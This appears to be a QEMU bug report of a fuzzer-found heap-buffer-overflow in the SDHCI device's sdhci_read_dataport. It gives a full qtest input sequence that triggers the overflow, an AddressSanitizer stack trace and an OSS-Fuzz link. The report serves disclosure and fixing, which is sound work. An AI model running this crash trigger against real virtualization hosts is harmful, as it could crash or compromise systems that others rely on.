sdhci: Heap-buffer-overflow in sdhci_read_dataport
Hello,
Reproducer
cat << EOF | ./qemu-system-i386 -display none -machine accel=qtest -m 512m \
-nodefaults -device sdhci-pci,sd-spec-version=3 -device sd-card,drive=mydrive \
-drive if=none,index=0,file=null-co://,format=raw,id=mydrive \
-nographic -qtest stdio
outl 0xcf8 0x80001010
outl 0xcfc 0xe0000000
outl 0xcf8 0x80001004
outw 0xcfc 0x7
write 0xe0000005 0x1 0x73
write 0xe0000028 0x1 0x55
write 0xe000002c 0x1 0x55
write 0x0 0x1 0x65
write 0x7 0x1 0x69
write 0x8 0x1 0x65
write 0xf 0x1 0x69
write 0x10 0x1 0x65
write 0x17 0x1 0x69
write 0x18 0x1 0x65
write 0x1f 0x1 0x69
write 0x20 0x1 0x65
write 0x27 0x1 0x69
write 0x28 0x1 0x65
write 0x2f 0x1 0x69
write 0x30 0x1 0x65
write 0x37 0x1 0x69
write 0x38 0x1 0x65
write 0x3f 0x1 0x69
write 0x40 0x1 0x65
write 0x47 0x1 0x69
write 0x48 0x1 0x65
write 0xe000000c 0x1 0x55
write 0xe000000e 0x1 0x2c
write 0xe000000f 0x1 0x5b
write 0xe0000010 0x2 0x0646
write 0x50 0x1 0x65
write 0x57 0x1 0x69
write 0x58 0x1 0x65
write 0x5f 0x1 0x69
write 0x60 0x1 0x65
write 0x67 0x1 0x69
write 0x68 0x1 0x65
write 0x6f 0x1 0x69
write 0x70 0x1 0x65
write 0x77 0x1 0x69
write 0x78 0x1 0x65
write 0x7f 0x1 0x69
write 0x80 0x1 0x65
write 0x87 0x1 0x69
write 0x88 0x1 0x65
write 0x8f 0x1 0x69
write 0x90 0x1 0x65
write 0x97 0x1 0x69
write 0x98 0x1 0x65
write 0xe0000026 0x2 0x5a06
write 0xe0000028 0x4 0x46c0c9c9
write 0xe0000028 0x1 0x55
write 0xe000002a 0x1 0x5a
write 0xa0 0x1 0x65
write 0xa5 0x1 0xff
write 0xa6 0x1 0xff
write 0xa7 0x1 0xdf
write 0xe000000c 0x1 0x27
write 0xe000000f 0x1 0x55
EOF
Stack-Trace
==59877==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61500001f180 at pc 0x5648eb1f52f9 bp 0x7ffd365aa900 sp 0x7ffd365aa8f8
READ of size 1 at 0x61500001f180 thread T0
#0 0x5648eb1f52f8 in sdhci_read_dataport ../hw/sd/sdhci.c:474
#1 0x5648eb1f52f8 in sdhci_read ../hw/sd/sdhci.c:996
#2 0x5648eb89aced in memory_region_read_accessor ../softmmu/memory.c:440
#3 0x5648eb8910dd in access_with_adjusted_size ../softmmu/memory.c:550
#4 0x5648eb8aa230 in memory_region_dispatch_read1 ../softmmu/memory.c:1426
#5 0x5648eb8aa230 in memory_region_dispatch_read ../softmmu/memory.c:1448
#6 0x5648ebb0f0ae in flatview_read_continue ../softmmu/physmem.c:2842
#7 0x5648ebb10924 in flatview_read ../softmmu/physmem.c:2881
#8 0x5648ebb10924 in address_space_read_full ../softmmu/physmem.c:2894
#9 0x5648ebb10924 in address_space_rw ../softmmu/physmem.c:2922
#10 0x5648eb1eff04 in dma_memory_rw_relaxed /tmp/qemu/include/sysemu/dma.h:88
#11 0x5648eb1eff04 in dma_memory_rw /tmp/qemu/include/sysemu/dma.h:127
#12 0x5648eb1eff04 in dma_memory_read /tmp/qemu/include/sysemu/dma.h:145
#13 0x5648eb1eff04 in sdhci_do_adma ../hw/sd/sdhci.c:811
#14 0x5648eb1f206f in sdhci_data_transfer ../hw/sd/sdhci.c:901
#15 0x5648eb1f8a99 in sdhci_send_command ../hw/sd/sdhci.c:376
#16 0x5648eb1f8a99 in sdhci_write ../hw/sd/sdhci.c:1186
#17 0x5648eb89a09a in memory_region_write_accessor ../softmmu/memory.c:489
OSS-Fuzz Report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36391
libqtest Reproducer: reproducer.c
Thank you
Edited by Alexander Bulekov